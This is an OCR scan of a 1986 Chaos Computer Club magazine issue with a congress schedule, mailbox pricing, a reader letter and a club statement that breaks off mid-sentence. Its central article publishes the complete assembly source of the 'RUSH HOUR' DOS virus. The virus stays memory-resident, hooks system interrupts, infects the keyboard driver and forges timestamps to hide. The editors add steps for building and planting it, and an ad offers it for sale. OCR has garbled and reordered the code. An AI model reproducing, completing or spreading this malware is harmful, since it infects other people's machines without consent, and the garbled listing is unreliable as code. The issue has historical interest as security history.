============== Page 1/1 ============== Die Datenschleuder Nummer 17 Dezember 1986 DM 2,50 Das wissenschaftliche Fachblatt für Datenreisende Ein Organ des Chaos Computer Club Postvertriebsstück C9927F MASCHINEN ZEITALTER... Chaos Communication Congress ’86 Die Europäische Hackerparty Damit Sie auch morgen noch kraftvoll zubyten kön­ nen: Zum dritten Mal veranstaltet der CCC in Ham­ burg seinen Communication Congress. Vom 27. De­ zember (Aufbautag) über Sonntag und Montag (Congresstage) bis zum Dienstag den 30. Dezember (Ab­ bautag) treffen sich Datenreisende, Telefonfreaks, Informationspfadfinder, Funkmaniacs, Netzflaneuere, Bitniks, Hacker und Häcksen. Veranstaltungsort ist das Eidelstedter Bürgerhaus, Elbgaustraße 12, in Hamburg Eidelstedt. Dort öffnen sich am Sonntag den 28. Dezember gegen 10 Uhr die Tore. Helfer und Referenten wer­ den schon ab Samstag Nachmittag eingelassen. We­ gen der technischen Demonstrationen gelten die Räumlichkeiten als „Elektrisches Labor“, zu dem nur Unterwiesene Zutritt haben. Jeder Teilnehmer hat sich bei örtlichen Funkamateuren oder Elektronikern vorher fachkundig zu machen. Das Fotografieren sowie das Aufzeichnen mittels Tonträgern ist, wie in den vergangenen Jahren, aus Datenschutzgründen untersagt. Im Rahmen der Pressearbeit sind TVTeams anwesend. Gäste benötigen dieses Jahr kein Passfoto, lediglich Helfer bekommen einen Ausweis und sollten ein Passfoto mitbringen. Sollte ein Gast auf einem SOU­ VENIR bestehen, erhält er natürlich einen. Der Eintritt beträgt für Mitglieder (CCCeV) DM 15,-, für alle anderen DM 20,-, mit Ausnahme der Presse (DM 50,-) und gewerblichen Teilnehmern (DM 150,-) Voranmeldung durch Einzahlung auf Postgiros 599090-201 beim Postschleckamt Hamburg BLZ 20010020 für den CCCeV. Bitte Beleg mitbringen! Der Betrag gilt für die ganze Congressdauer. Schlafplätze sollte man sich privat besorgen. Fragt über die Hamburger Mailboxen an. Wer es sich lei­ sten kann, dem sei ein preiswertes Zimmer auf der Reeperbahn (da gibts nachts noch was zu essen) emp­ fohlen. Für Ausnahmefälle hat der CCC ca. 30 Nachtlager (Schlafsack!) von Samstag bis Montag in petto. Während des Congresses ist die CONGRESS-BOX unter der Rufnummer 040-5703060 online. (ACH­ TUNG : Diese Nummer gilt nur vom 27. - 30.12.!) Die VERMITTLUNG des Congresses ist über die Rufnummer 040-5703086 ab Freitag erreichbar. WEITERE INFORMATIONEN in der CCC Ge­ schäftsstelle 040-4903757, der CLINCH-Mailbox 040-6323517 oder, für Referenten und was Organisa­ tionsfragen betrifft, Leitstelle 23: 040-483752 (Voi­ ce!). Datenschleuder 1 ПРАЗДШ БРАТСТВА ЛЮДЕИ ТРУДА ΤΟ ΤΕΣΤ ΤΟ ΔΙΧΡΩΜΟ ΤΕΤΡΑΓΩΝΟ Kongressfahrplan Samstag 27. Dezember (Aufbautag) HEY! Für Techniker, Referenten und Unterstützer Sonntag 28. Dezember (1. Congresstag) Montag 29. Dezember (2. Congresstag) 09:00 Einlass für Mitarbeiter, Techniker und Refe­ renten 09:30 Abnahme der Räume (letzter SicherheitsCheck) 10:00 TORI: Einlass für Gäste. Öffnung. HACK-CENTER: Technik al la Cart’ CHAOS-CAFE: Frühstück und Cafe TREFF: Raum für Gesprächsgruppen (bitte anmel­ den) ARCHIV: Fotokopiererund viel Papier BILD&FUNK: Datenfunk und Bildschirmtext 11:00 THEATER: Eröffnungsansprache. Hinweise zum Ablauf 11:30 TREFF: Infotreff für die Presse (max. 30 Min.) 12:00 THEATER: Sichere Kopplung an das Postnetz. Was läuft bei der Post; Prüfverfahren. Verhalten bei Haus­ durchsuchungen. (Workshop BHP,CAC,CCC) 13:30 THEATER: Parlakom - das Parlament am Netz. Computer im Bundestag (Vortrag der Hamburger) 14:30 THEATER: Die Computer Artists Cologne stellen sich vor. 14:30 TREFF: Datenfernübertragung für Anfänger (Workshop) 15:30 THEATER: PC-Virenforum (Workshop BHP,CCC und Gäste) - Was sind Computerviren? (Vortrag) - Wie arbeiten Viren? (prakt. Demo) - Gibt es einen Schutz vor Viren? (Workshop) - Umgang mit Viren, Ausblick (Diskussion) 18:30 Ende 18:50 THEATER: Video über den letzten Congress (bis 20:20) 19:00 TREFF: Organisationsgespräch der Projektlei­ ter 19:30 Schliessung der Räume. Alle gehen ins Theater. 20:00 THEATER: Hinweise auf das Programm vom Montag, Übernachtungsmöglichkeiten,... 20:30 Tagungsende 21:00 Schliessung der Räume (Wachdienst) 08:00 Aufklaren der Räume durch Nachtschicht 09:00 Einlass der Mitarbeiter, Raumabnahme 09:30 TOR1: Einlass für Gäste. Öffnung. 10:00THEATER: Programmvorschau 10:30 THEATER: Kompromittierende Abstrahlung; Abhören von Monitoren und Fernsprechern. (Workshop BHP,CCC) 11:30 THEATER: Frühschoppen Fünf Hacker aus sechs Ländern (in Englisch) 13:00 TREFF: Pressetreff (CCC,CAC,BHP und Gä­ ste) 13:00 THEATER: Resümee des Sysoptages vom letz­ tem Congress. Kurz zu InterpoolNet. Hinweise auf Workshops. 14:00 THEATER: Informationen zum Netzverbund FIDO-NET 14:00 TREFF: Auswirkungen des 2. WiKg. Workshop auch über ’’Hacker-Jäger ” (BHP) 15:00 THEATER: Desktop Puplishing - die Zeit­ schrift vom Schreibtisch. Am Beispiel des Genethischen Informa­ tionsdienstes. (Vortrag) 15:00 TREFF: Regionale Vernetzung von Mailboxen, Serversystem (Vortrag und Demo CAC) 16:00 THEATER: Noch offen Datenschleuder 2 16:30 TREFF: Btx als preiswerter Datenserver. Vor­ schlag zum Datenaustausch für Mailboxsysteme. (Idee) 17:00 TREFF: Mailboxen - neue Konzepte (Referat&Diskussion) 18:00 THEATER: Abschlussansprache, Ausblick 20:00 Schliessung der Räume für Gäste 21:00 Abbau der privaten Technik (geordneter Rück­ zug) 22:00 Schliessung der Räume (Wachdienst) Wo ist der CCC? Zur Lage der Chaos Communication Center Der CCC bietet seinen Mitgliedern zwei Möglichkei­ ten zur elektronischen Kommunikation an : 1. Die INFEX-Mailbox (über DATEX-P) Für eine Eintragungsgebühr von DM 20,- sowie eine monatliche Mindestnutzungsgebühr von DM 8,- wird die Nutzung eines GEONET-Systems angeboten. Auf diesem kommerziell genutzten System haben die Mitglieder den üblichen Komfort eines GEONETSystems. Dazu zählen: Mitteilungsversand im GEONET, Telexzugang und Abfrage von Datenbanken usw. Aus Kostengründen wird die elektronische DA­ TENSCHLEUDER in Zukunft „kostenpflichtig“ im GEONET abzurufen sein. Es ist dem CCC nicht möglich, weiterhin die hohen Aufwendungen zur In­ formationsgestaltung zu bezahlen. Diese Beweg­ gründe stehen auch hinter der Entscheidung, wesent­ liche Teile der Clubkommunikation auf die Hambur­ ger CLINCH-Box zu verlegen. Im Wesentlichen be­ stehen jedoch weiterhin die in der DS16 erwähnten Leistungsmerkmale. Es ist immer noch unklar, wann die INFEX-Box über einen Telefonport erreicht wer­ den kann. Wir empfehlen die Teilnahme am INFEXSystem all denen, die für ihren Kommunikation einen TELEX-Zugang benötigen und die Vorteile eines Mehrportsystemes zur reibungslosen Kommunika­ tion brauchen. Hier kurz die Nutzungskosten der INFEX im Rah­ men der CCC Nutzung: (Mitgliedschaft im CCC so­ wie Erteilung einer Einzugsermächtigung) Eintragung einmalig DM 20,Mindestnutzung für mtl. DM 8,je Verbindungsminute DM -, 15 ! je Nachricht DM -,07 ! je Telefonalarm DM -,80 ! Telex, Datenbanken und InterMail-Vermittlungen extra. ! (Diese Preise werden bei negativer Feststellung der Gemeinnützigkeit des CCCeV noch mit der Mehr­ wertsteuer belegt.) Monatlich werden die angefallenen Nutzungskosten berechnet und eingezogen. Die Kündigungsfrist be­ trägt 3 Monate. Informations 2. Die CLINCH-Box (über Telefonport Hamburg und Datex-P) Der wesentliche Grund zur Verlagerung der Club­ kommunikation ist der Standortvorteil der CLINCHBox. Sie ist für die Hamburger zum Ortstarif erreich­ bar und verfügt zudem über einen Datex-P-Zugang. Die CLINCH-Box unterscheidet sich jedoch von dem Standard der INFEX-Box. So kann jeweils nur ein Nutzer (wahlweise Telefon oder Datex) zugreifen. Auch fehlt der Komfort in Sachen Datenbanken und Telexverkehr. Es wird zwar eine Vermittlung angebo­ ten, die jedoch nur ein Notlösung ist. Wer den TelexZugang benötigt, sollte das komfortablere INFEXSystem wählen. Auf der CLINCH-Box wird in Zukunft die DATEN­ SCHLEUDER redaktionell erstellt und (da dieses System auf Selbstkostenbasis betrieben wird) auch kostenfrei zum Abruf angeboten. Es finden sich dort auch diverse Diskussionsforen der Mitglieder und anderer Gruppierungen. Hier kurz die Nutzungskosten der CLINCH-Box: Mitgliedschaft im CCC (für den Zugang zu den clu­ binternen Infos) Für Schüler und Studenten DM 24,- jährlich Für Vollverdiener DM 60,- jährlich zuzüglich Kosten für vermittelte Dienstleistungen (Telex,Datenbankabfra­ gen..) Die Nutzungsgebühren für das System werden direkt von der CLINCH Box in Rechnung gestellt. Kündi­ gungsfrist zum Ende jeden Monats. Die Redaktion hofft, daß durch Wahl eines preiswer­ teren Kommunikationsweges mehr Interessenten den Zugang zu Clubinformationen finden, als dies bisher möglich, war. Weiterhin werden die Mitglieder, die einen Zugang zu GEONET benötigen, diesen im Rahmen der Mitgliedschaft preiswert erhalten. Im Vordergrund der Auswahl für eines der beiden Sy­ steme sollte einzig die Frage des Bedarfs stehen. Ge­ wisse Kommunikationsaufgaben lassen sich nur mit kommerziellen Systemen bewältigen, andere hinge­ gen sind preiswerter lösbar. Lassen Sie sich von der Geschäftsstelle des CCC beraten. Anfragen zur Teilnahme an den Mailboxsystemen im Rahmen der CCC- Mitgliedschaft können an die Clubadresse oder die CLINCH Box mit dem Stich­ wort „CC-Center“ gerichtet werden. Fernmündliche Auskünfte: CCC Geschäftsstelle: 040- 490 37 57 Btx-Redaktion LS23 :040- 48 37 52 Datenauskünfte: CLINCH Telefon : 040- 632 35 17 CLINCH Datex : 44400090314 Im GEONET : Brett IFX1 :Datenschleuder LS23 Datenschleuder 3 Funktion und Aufbau des Virus ’’RUSHHOUR” (Läuft auf allen IBM-kompatiblen Rechnern, nicht jedoch auf allen MS-DOS Rechnern wie Olivetti usw.) Viel über allgemeine Computerviren will ich hier nicht reden, sondern nur den Aufbau und die Funktion meines Vi­ rus erklären. Folgende Forderungen an das VirusProgramm hatte ich mir gestellt: 1: Es sollte so unauffällig wie möglich arbeiten, d.h. kein Disketten- oder Plattenzugriff, der dem auf­ merksamen (!!) Benutzer unlogisch vorkommt. 2: Absolut alle bisher auf dem Rechner lauffähigen Programme sollten weiterhin völlig normal rechnen. 3: Der Virus sollte sich kontrolliert vervielfältigen, d.h. er sollte sich nicht an jedes Programm hängen, damit seine Existenz nicht durch eine immer mehr be­ legte Platte/Diskette auffällt. 4: Die Aktivität des Virus sollte zeitverzögert einsetzen, um die Herkunft des Virus (also: welches Pro­ gramm hat den Virus eingeschleust) zu verschleiern. Am Anfang hatte ich mir überlegt, einen Virus zu schreiben, der sich in jedes lauffähige Programm (.COM oder .EXE) einbinden kann. Das ließ ich dann aber aus folgenden Gründen sein: 1: .COM und .EXE-Files sind unterschiedlich in ihrer Dateistruktur. Das V-Programm muß zwischen den Arten unterscheiden können und sich selbst der Struktur anpassen. Das kostet unter Umständen sehr viel Speicherplatz für den Virus. 2: Eine Infektion von so vielen Dateien ist durch den vermehrten Platzbedarf auf dem Speichermedium auffällig. Ich entschloss mich daher, den folgenden Weg zu ge­ hen: Der Virus setzt sich nur in einem bestimmten Pro­ gramm fest, das vom Computer unbedingt benötigt wird, also im Betriebssystem oder in einem Teil da­ von. Ich wählte den Tastaturtreiber KEYBGR.COM für diesen Zweck. Der Grund dafür war einfach, daß die meisten IBM-kompatiblen Rechner nicht mit PC­ DOS 2.0, sondern mit dem (fast!) identischen MSDOS 2.11 arbeiten. Dieses MS-DOS, bzw. dessen Ta­ statur-Treiber, war für den Olivetti M24 vorgesehen, der im Vergleich zum IBM eine komplexere Tastatur besitzt. Läuft der Tastaturtreiber auf einem IBM, so ist das Vergeudung; der eigentlich benötigte Tastatur­ treiber umfaßt nur 1543 Bytes, während der benutzte 6549 Bytes lang ist. Ich hängte also an den IBMTreiber einfach mein Virus-Programm und der Trei­ ber war schon etwa 2000 Bytes lang — dann wurde er noch auf die ’’benötigten”, d.h. unauffälligen 6549 Bytes erweitert (hier könnte z.B. ein 4500 Zeichen langer Text über die Gefährlichkeit der Computervi­ ren abgelegt werden) — und fertig ist der Virus. Der Virus sucht, wenn er im System ist, bei jedem vom Benutzer erzeugten Platten/Diskettenzugriff im aktuellen Directory nach dem Tastaturtreiber. Die Unterscheidung infiziert/sauber wird nach der Zeit der letzten Änderung des Files KEYBGR.COM ge­ troffen. Das MS- DOS File hat eine gespeicherte Zeit Datenschleuder 4 von 9:00:03 (angezeigt im DIR wird 9:00 ) während das infizierte die Dateizeit von 9:00:00 hat. Somit ist eine Unterscheidung allein aus dem Directory-Ein­ trag ohne langwierigen weiteren Diskettenzugriff möglich. Alles weiteren wichtigen Informationen geben die Kommentare im Quellcode. REPRODUKTION Ergänzungen der Redaktion zum Virusprogramm: Der Virus muss nun noch assembliert, gelinkt und dann in ein COM- File gewandelt werden. Mittels eines geeigneten Monitors werden nacheinander der Virus und der Tastaturtreiber geladen und mit 6549 Bytes als KEYBGR.COM zurückgeschrieben. Gege­ benenfalls muss der durch den Treiber überschriebene Virusanfang restauriert werden, bevor das infizier­ te File auf Disk geschrieben wird. Das sollte für einen geübten Assemblerprogrammierer kein Problem sein. Der vorliegende Virus zeichnet sich übrigens durch einige Besonderheiten aus, die ihn als besonders geeignet für die erste vollständige Veröffentlichung eines Virussourcecodes erscheinen lassen: Er hat alle Eigenschaften eines Virus, ohne zerstörend zu wir­ ken, wenngleich auch unbedarfte Anwender, die den Virus einfangen, an Hardwaredefekte denken mögen. Der Virus arbeitet im Verborgenen und wird nur dann aktiv, wenn ohnehin durch den Anwender auf Diskette/Platte zugegriffen wird, er fällt also nicht so leicht auf. Drittens kann man den Virus kontrollieren, weil er ja nur das Programm KEYBGR.COM befällt, und das auch nur, wenn dieses Programm mit der Uhrzeit 09.00.03 im Directory steht. Dieser Umstand führte in der Redaktion zu argen Schwierigkeiten, denn für den als Versuchskaninchen ausgesuchten Rechner gab es zunächst kein KEYBGR.COM, welches den Ansprüchen des Virus genügt. Kurzum, es ist ein Vi­ rus, der voll funktionsfähig ist, aber wohl kaum grös­ sere Verbreitung finden dürfte. Die Virusaktivität besteht darin, daß bei jedem Ta­ stendruck und Bilschirmausgabe eines Zeichens ein kurzes Rauschen (’’Pchchch!”) zu hören ist und der Benutzer an einen Hardwarefehler denken könnte. PAGE 72,132 TITLE Virus “RUSH HOUR“ (p) Foxi ,1986 NAME VIRUS Assume ds:NOTHing, es:nothing MOVAХ,4В00H JMP DOSVECTOR ; Normale Funktionsausfuehrung VIRUS ENDP ERROR PROC FAR IRET ; Einfach alle Fehler ; ignorieren... ERROR endp Bakteriologisch-rezeptfreier Datenvertrieb BRD beim CCC! STI MOV AH, 0 INT 1AH ; Lese TlmeOfDay (TOD) MOV TIME0,DX LEA DX,VIRUSENDE INT 27H ; Programm beenden, aber ; resident bleiben. VIDEOVECTOR DW 2 DUP(?) DOSVECTOR DW 2 DUP(?) ERRORVECTOR DW 2 DUP (?) TIME0 DW ? ; ; VIRUS Hauptprogrammteil : ; ; 1. Systemaufruf AH-4BH ? ; Nein : — ’ 2. ; Schon infiziert ? ; Ja : --’ 3. ; ; 2. Sprung ins normale DOS ; RNDVAL DB 'bfhg' ACTIVE DB 0 ; Nicht aktiv. PRESET DB 0 ; Allererster Virus nicht aktiv ! DB 'A:' FNAME DB 'KEYBGR COM' DB 0 VIRUS PROC FAR ASSUME CS:CODE, DS:NOTHING, ES:NOTHING PUSH AX PUSH CX PUSH DX MOV AH,0 ; Pruefe, ob mindestens 15 Min. INT 1AH ; seit Initialisierung vergangen SUB DX,TIME0 ; sind. CMP DX,16384 ; (16384 Ticks des Zeitgebers =15 Min.) JL $3 MOV ACTIVE,1 ; Falls ja, aktiviere Virus. $3: POP DX POP CX POP AX ; Diskettenzugriff ; aufgrund des CMP AX,4B00H ; DOS Kommandos JE $1 ; “Programm laden und ausfuehren“ ? EXIT1: JMP DOSVECTOR ; Nein : —" Normal weiter $1: PUSH ES ; ES:BX —' Parameterblock PUSH BX ; DS:DX —' Dateiname PUSH DS ; Sichere Register, die noch ; gebraucht PUSH DX ; werden fuer INT 21H (AH-4BH) MOV DI,DX MOV DRIVE,0 ; Setzen des Laufwerkes des MOV AL,DS:DI+1 ; auszufuehrenden Programmes CMP AL,':' JNE $5 MOV AL,DS:DI SUB AL,'A'-1 MOV DRIVE,AL $5: CLD PUSH CS POP DS XOR AX,AX MOV ES,AX ASSUME DS:CODE, ES:ABS0 MOV AX,ERRORINT ; Ignorieren aller Disketten- Origi nal-Quälcode NUR beim CCC! Vor Kopien wird gewarnt! Take Your Virus And Run: ATA 30, BIM.XT 40, BIM.AT 50 DM ABSO SEGMENT AT 0 ORG 4*10H VIDEOINT DW 2 DUP (?) ; VIDEO INTERRUPT VECTOR ORG 4*21H DOSINT DW 2 DUP (?) ; DOS -“ORG 4*24H ERRORINT DW 2 DUP (?) ; ERROR -“ABSO ENDS CODE SEGMENT ASSUME CS:CODE, DS:CODE, ES:CODE ORG 05CH FCB LABEL BYTE DRIVE DB ? FSPEC DB 11 DUP (' ') ; Filename ORG 6CH FSIZE DW 2 DUP (?) FDATE DW ? ; Datum des letzten Schreibens FTIME DW ? ; Zeit -“- -"ORG 80H DTA DW 128 DUP (?) ; Disk Transfer Area ORG 071EH ; Ende des normalen KEYBGR.COM XOR AX,AX MOV ES,AX ; ES zeigt auf ABS0 ASSUME ES:ABSO PUSH CS POP DS MOV AX,VIDEOINT ; Speichere alte Interruptvektoren MOV BX,VIDEOINT+2 MOV VIDEOVECTOR,AX MOV VIDEOVECTOR+2,BX MOV AX, DOSINT MOV BX, DOSINT+2 MOV DOSVECTOR,AX MOV DOSVECTOR+2, BX CLI MOV DOSINT,OFFSET VIRUS ; Neuer DOS - Vektor zeigt auf VIRUS MOV DOSINT+2,CS MOV VIDEOINT, OFFSET DISEASE ; VIDEO V- ektor zeigt auf DISEASE MOV VIDEOINT+2, CS ; "fehler" MOV BX,ERRORINT+2 ; durch eigene Fehlerroutine MOV ERRORVECTOR,AX MOV ERRORVECTOR+2,BX MOV ERRORINT,OFFSET ERROR MOV ERRORINT+2, CS PUSH CS POP ES ASSUME ES:CODE LEA DX,DTA ; Disk Transfer Area anwaehlen MOV AH,1AH INT 21H MOV BX,11 ; Uebertragen des Dateinamens $2: MOV AL,FNAME-1BX ; in den FileControlBlock MOV FSPEC-1BX,AL DEC BX JNZ $2 LEA DX,FCB ; oeffne Datei { zum Schreiben ) MOV AH,0FH INT 21H CMP AL, 0 JNE EXIT0 ; Datei existiert nicht —' Ende MOV AX,FTIME ; Datei schon infiziert ? CMP ΑΧ,4800H JE EXIT0 ; Ja —' Ende MOV PRESET,1 ; (Alle Kopien sind virulent !) MOV SI,100H ; Schreibe den VIRUS in die Datei $4: LEA DI,DTA MOV CX,128 REP MOVSB LEA DX,FCB MOV AH,15H INT 21H CMP SI,OFFSET VIRUSENDE JL $4 MOV FSIZE,OFFSET VIRUSENDE - 100H MOV FSIZE+2,0 ; Korrekte Dateigroesse setzen MOV FDATE,0AA3H ; Korrektes Datum (03.05.86) ; setzen MOV FTIME,4800H ; Korrekte Zeit ( 9:00:00) ; setzen LEA DX,FCB ; Datei schliessen MOV АН,10H INT 21Н XOR ΑΧ, ΑΧ MOV ES,ΑΧ ASSUME ES:ABS0 MOV АХ, ERRORVECTOR ; Ruecksetzen des Fehler; Interrupts MOV SX, ERRORVECTOR+2 MOV ERRORINT, ΑΧ MOV ERRORINT+2, BX ΕΧΙT0: POP DX ; Rueckholen der gesicherten ; Register POP DS POP BX POP ES DISEASE PROC FAR ASSUME DS:NOTHING, ES:NOTHING PUSH AX PUSH CX ; Diese Register wегdеп zerstoert ! TEST PRESET,1 JZ EXIT2 TEST ACTIVE,1 JZ EXIT2 INAL,61H; Lautsprecher einscha1ten AND AL,0FEH ; ( Bit 0 := 0 ) OUT 61H,AL MOV CX,3 ; Schleifenzaehler CX NOISE: MOV AL,RNDVAL ; : XOR AL, RNDWAL+3 ; : SHL AL,1 ; Generiere RAUSCHEN SHL AL,1 ; : RCL WORD PTR RNDVAL,1 ; : RCL WORD PTR RNDVAL+2 ; : MOV АН,RMDBAL ; Ausgabe eines beliebigeп AND AH,2 ; Bits des rueckgekoppelter IN AL, 61H ; Schieberegisters AND AL, 06FDH ; — ` Lautsprecher rauscht ... OR AL,АН OUT 61Н,AL LOOP NOISE AND AL, 0FCH ; Lautsprecher ausschalten OR AL,1 OUT 61H,AL EXIT2: POP CX POP AX JMP VIDEOVECTOR ; in die normale VIDEO - Routine ; springen ........... DISEASE ENDP DB 'Dieses Programm ist ein sogenanntes VIRUS - Pro-' DB 'gramm. Es hat, einmal aktiviert, die Kontrolle ueber' DB 'alle Systemeinheiten und sogar ueber die vom' DB 'Benutzer eingelegten Speicherungsmedien. Es kopiert' DB 'sich selbststaendig in noch nicht infizierte Be' DB 'triebssysteme und verbreitet sich so unkontrolliert.' DB 'Das der Virus ln diesem Fall keine Benutzerprogramme' DB 'zerstoert oder Speichermedien loescht, ist nur ein' DB 'philantropischer Zug des Authors................... ' ORG 1C2AH VIRUSENDE LABEL BYTE CODE ENDS END virsrc17.ds foxi 271186 1810 Datenschleuder 5 An die Weltregierung Laserbriefe Liebe Leute vom CCC, so Herbst/Ende letzten Jahres hatte ich bei euch 1 Hackerbibel Teil 1 zu 33.33 und 64 Kleber „Achtung Abhörgefahr“ A4 bestellt. Daraufhin tat sich ne Wei­ le gar nix und ich hatte die Bestellung eigentlich auch schon abgeschrieben, bis ihr plötzlich am 4.4.86 den damals beigefügten Scheck eingelöst habt. Seitdem ist aber auch nix mehr passiert. Es wäre ganz nett von euch, wenn ihr schon den Scheck einlöst und mein armes Konto überzieht, daß ihr mir auch was schickt, denn jetzt hätte ich auch echt wieder Lust auf das Buch. Wenn ihr die Kleber nicht mehr findet, packt halt ne andere nette Sache ’rein. Ok?? PS: Wißt ihr, was mich an euch nervt? Ihr seid so schweine-elitär. Muß doch echt nicht sein. Ist doch nichts dabei, aus ein paar ICs witzige Sachen zu bauen und was Feines, Subtiles mit zu machen. Da braucht man doch keine Avantgarde-Crew a la CCC. Sowas ist doch Scheiße und läuft unseren eigenen Zielen zuwider! Auch der Personenkult a la Wau ist doch zum Kotzen! Lieber 1000 subtile DFÜ-Crews in der Nacht, als noch eine Elite mehr. Volker Ernst Die CCC-Fachgruppe Weltregierung meint dazu: Zum einen: Wir sind von Zeit zu Zeit schlicht über­ fordert, was das Erledigen von Bestellungen angeht. Einfach, weil es an Zeit und Leuten mangelt, die ver­ antwortlich mitmachen. Im allgemeinen kriegen wir das aber zusammen mit den Bestellern in den Griff, ohne daß der Gerichtsvollzieher erscheinen muß. Don’t panic. Es läuft nicht ganz so glatt wie bei Quel­ le, wofür wir um Nachsicht bitten und Besserung nicht versprechen können. In bestimmten Dingen ist der CCC aber trotzdem, so hoffen wir, die bessere Quelle. Lieber Volker, Du solltest uns wirklich mal besuchen kommen (z.B. zum Congress), wenn Du den Eindruck hast, daß wir ein elitärer Haufen sind. Heiterkeit wird in Dein Herz einkehren, wenn Du die Realität siehst. Der CCC Hamburg ähnelt weniger einer Elite, die sich ja auch durch straffes, diszipliniertes Funktio­ nieren hervortun müßte, als vielmehr einem rechner­ gestützten Flohzirkus. Dieser Flohzirkus zeigt rapide Auflösungserscheinungen, wenn mal wieder Brief­ couverts zugeklebt werden müßten oder so, was u.a. zu den elastischen Lieferzeiten führt. Und er erzeugt andererseits als eine Art Gruppendynamo auch jene wunderliche Art von (technischen und politischen) Geistesblitzen, die in den letzten Jahren überall dort aufleuchten, wo sich Leute trickreich, spielerisch und kritisch mit elektronischer Datenverärgerung und Kommunikation auseinandersetzen: Bitpiloten wie Du und ich. Das, was wir alle machen, könnte man ’’Arbyte” nennen. Rumdüsen im Informationszeital­ ter. Eine Bordzeitung hältst Du gerade in der Hand. Datenschleuder 6 Mit welchen Absichten wir dieses kleine aber feine Käseblättchen herstellen, und daß dies nicht zu unse­ rer Privatbeölung geschieht, ist in dem Artikel „The­ ma Hacken“ ausführlicher beschrieben; siehe dort. Im übrigen: Willkommen an Bord. Captain Chaos begrüßt sie und wünscht einen angenehmen Flug nach Digitalien. Bitte abzuschnallen und das Rau­ chen fortzusetzen, wir booten in Kürze. Und da wir grade bei Piloten sind, noch ein Wort zum vermeintlichen Personenkult. Der Vorwurf, daß einem etwa Wau (bekannt aus Funk und Fernsehen) dauernd aus der Zeitung entgegenlacht, trifft nicht Wau, sondern die Medien. Journalisten arbeiten mit Schubladisierungen, und seit dem Btx-Coup haben sie Wau in der Lade mit der Aufschrift „Computer & Aberwitz“. Dort sitzt er nun, bzw. jener Teil seiner Seele, der in der Medienlandschaft „Image“ heißt. Und wenn irgendwo wieder ein armes schwaches Elektronengehirn in Ohnmacht gefallen ist, ziehen die Journalisten die Lade auf, zappklapp, und bei Wau beginnt das Telefon zu rauchen, so einfach ist das. Aus diesem Grund lassen sich beispielsweise Stammesangehörige der Massai (Ostafrika) nicht fo­ tografieren (nicht wegen Wau, sondern wegen dem gefangenen Image). Dieser Effekt potenziert sich dann nach dem Motto „Leute versammeln sich dort, wo sich schon Leute versammelt haben“, d.h. durch die Berichterstattung kriegen nicht nur immer mehr Leser, sondern natürlich auch immer mehr Journali­ sten Wau in die Lade. Grade für ein so inhomogenes Sortiment von Zeitgenossen wie es Computerfreaks darstellen, ist es doch von entscheidender Wichtig­ keit, über Sprecher zu verfügen, die eine weit gestreu­ te Aufmerksamkeit finden und das Kunststück zuwe­ ge bringen, die gemeinsame Hackerphilosophie ak­ tuell auf den Punkt zu bringen und gleichzeitig auf eine auch für Nichtfreaks verständliche Weise EDVkritische Rauchsignale aus dem Maschinenland ab­ zugeben. Das kann nicht jeder. Wer sich in der Me­ dienpräsenz der Computersubkultur ein demokrati­ sches Modell, etwa nach dem grünen Rotationsprin­ zip, wünscht, dem muß man zu bedenken geben, daß ein soziokybernetisches Infotop (langsam nochmal lesen) wie der CCC sich nicht wie ein Gesangsverein vor einer Fernsehkamera zusammenschieben läßt. Und nicht an Dich gerichtet, Volker, aber an jene, die vielleicht ein bißchen eifersüchtig auf das Wau-Ima­ ge sind: Wer meint, daß es der reine Eitelkeitsgenuß ist, wenn man sich alle acht Wochen im SPIEGEL bewundern kann, der hat sich kräftig in den Finger geschnitten. Im öffentlichen Interesse zu stehen, zu­ mal wenn es dabei bisweilen um Aktionen am Rande der Legalität geht, erweckt u.a. auch rasch die Auf­ merksamkeit behördlicher Stellen, die einem fortan von Amts wegen ganz empfindlich im Privatleben herumrüsseln. Für den Großteil der Bevölkerung waren Hacken und Datenakrobatik vor noch nicht allzu langer Zeit ge­ nauso obskure Angelegenheiten wie Flechtenkunde oder Ägyptologie. Von daher betrachtet war die HaSpa/Btx-Geschichte für uns alle sowas wie die spek­ takuläre Öffnung der Grabkammer des Tutenchamun. Statt uns in Kleingeisterei zu zernörgeln, sollten wir die Goldmaske „Image“ pflegen, der es mit zu verdanken ist, daß wir unsere Grabungen in den do­ tierten Siliziumplättchen fortführen können, ohne umgehend im Verließ zu landen. Nobody is Plusquamperfekt. Und grade wer sich ein­ gehender mit Medien und Kommunikationstechno­ logie befaßt, wird gut wissen, daß zwischen der Per­ son Wau („Herr Wau aus Holland bitte zum Informa­ tionsschalter“) und dem Image Wau ein wichtiger und vor allem wirklichkeitsmächtiger Unterschied besteht. In eine Bierkiste passen etwa acht SpaceShuttles, und das World Trade Center ist zirka so hoch wie eine Packung Butterkeks: Das sind die Dimen­ sionen der Wirklichkeit, wie sie beispielsweise das Fernsehen zeigt. Im übrigen sind wir dankbar für jeden, der uns bei der Ausübung unserer avantgardistischen und elitä­ ren Beschäftigungen, nämlich bei den verlustreichen Gefechten im Papierkrieg, beim Kaffeekochen, Sor­ tieren, Müllrunterbringen, Interviewsgeben und 1Million-kleine-Dinge-erledigen tatkräftig unterstützt. Lieber 1000 subtile Crews, die beim Eintüten helfen, als noch eine eingegangene Zeitung mehr. Und nun das Wetter. THEMA HACKEN Ein Statement Die 1. ausserordentliche Mitgliederversammlung be­ schloss am 8.11.86 zwei Punkte, die sich wesentlich fÜr unsere Mitglieder auswirken werden: Zum ersten, die Änderung der Vereinssatzung. Durch die Ablehnung der Gemeinnützigkeit aufgrund der Beurteilung, daß „Hacken“ keinen gemeinnütziger Zweck im Sinne der Abgabenordnung darstelle, wur­ de eine Umformulierung der Satzung nötig. Es wurde folgende Satzungsänderung beschlossen und zur Eintragung in das Vereinsregister einge­ reicht : Der Paragraph 2, Absatz 1, Punkt 7, bisheriger Wort­ laut ’Hacken’, wird gestrichen und durch die Formu­ lierung ’Förderung des schöpferisch-kritischen Um­ gangs mit Technologie’ ersetzt. Zum Zweiten der weitere Betrieb des Chaos Commu­ nication Center: Der Vorstand des Clubs erläuterte die Situation des Chaos Communication Center auf dem INFEX-System. Die dort gemieteten Kapazitäten werden der­ zeit nur zu 30 Prozent genutzt. Der Zulauf ist erheb­ lich geringer als erwartet. Die Mitgliederversamm­ lung beschloss, die Clubarbeit auf die CLINCH-Box zu verlagern, außerdem aber die Teilnahmemöglich­ kelten auf dem Infex-System (soweit dies finanzier­ bar ist) für interessierte Mitglieder weiterhin anzubie­ ten. Zur praktischen Handhabung dieser Änderung siehe Artikel „Wo ist der CCC?“ Der Chaos Computer Club gilt in der Öffentlichkeit als eine Art Robin Data, vergleichbar mit Greenpea­ ce, Robin Wood und 